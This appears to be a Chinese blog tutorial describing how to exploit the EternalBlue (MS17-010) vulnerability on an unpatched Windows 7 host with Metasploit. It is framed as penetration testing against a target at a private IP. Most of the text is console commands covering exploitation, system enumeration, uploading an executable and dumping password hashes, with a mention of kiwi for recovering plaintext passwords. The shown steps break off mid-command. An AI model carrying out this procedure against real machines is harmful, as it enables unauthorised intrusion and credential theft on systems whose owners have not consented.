Kali MSF(metasploit)永恒之蓝漏洞利用

本文介绍了如何利用Metasploit框架针对Windows7系统,利用永恒之蓝漏洞(MS17-010)进行渗透测试。步骤包括启动msfconsole,搜索并使用漏洞模块,设置目标主机,检查权限,枚举信息,上传文件,密码破解,远程桌面控制,屏幕截图以及摄像头和麦克风控制等。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

Windows7永恒之蓝漏洞利用
1、靶机为win7系统且未即使更新补丁,并且开启了445端口,关闭了防火墙

2、输入msfconsole命令,启动msf

3、搜索漏洞代码,获取攻击模块
search 17-010 //搜索永恒之蓝漏洞代码MS17-010

4、使用第一个辅助模块,设置目标主机IP,执行后显示存在可利用的MS17-010漏洞
setg rhosts 192.168.1.17 //setg为设置全局变量,rhosts是目标主机,此命令表示后续操作中目标主机ip始终为192.168.1.17

5、使用第2个攻击模块,执行后显示 “WIN” 则说明连接成功

6、连接至目标主机后,可以获得system权限
getuid //查看用户权限
sysinfo //查看系统信息
run post/windows/gather/checkvm //命令可以查看目标主机是否为虚拟机,若为虚拟机,说明目标主机很可能是蜜罐

7、 可以看到物理磁盘有1个。逻辑磁盘有2个
run post/windows/gather/forensics/enum_drives //查看目标主机磁盘信息

8、可以查看目标主机运行的进程
run post/windows/gather/enum_services //查看目标主机运行进程信息

9、可以使用upload命令上传文件至目标主机目录下,也可以用linux系统命令操纵目标windows主机
upload /mnt/share/压缩软件.exe . //上传本地/mnt/share目录下的可执行文件至目标主机当前目录

10、查看目标主机安装了哪些软件
run post/windows/gather/enum_applications //枚举目标主机安装的软件

11、 目标主机密码破解
run hashdump //获取目标主机用户名密码的哈希值

(1)可以将哈希值复制到在线密码破解网站中破解

(2)也可以使用kiwi提权工具,获取密码的明文
load

评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值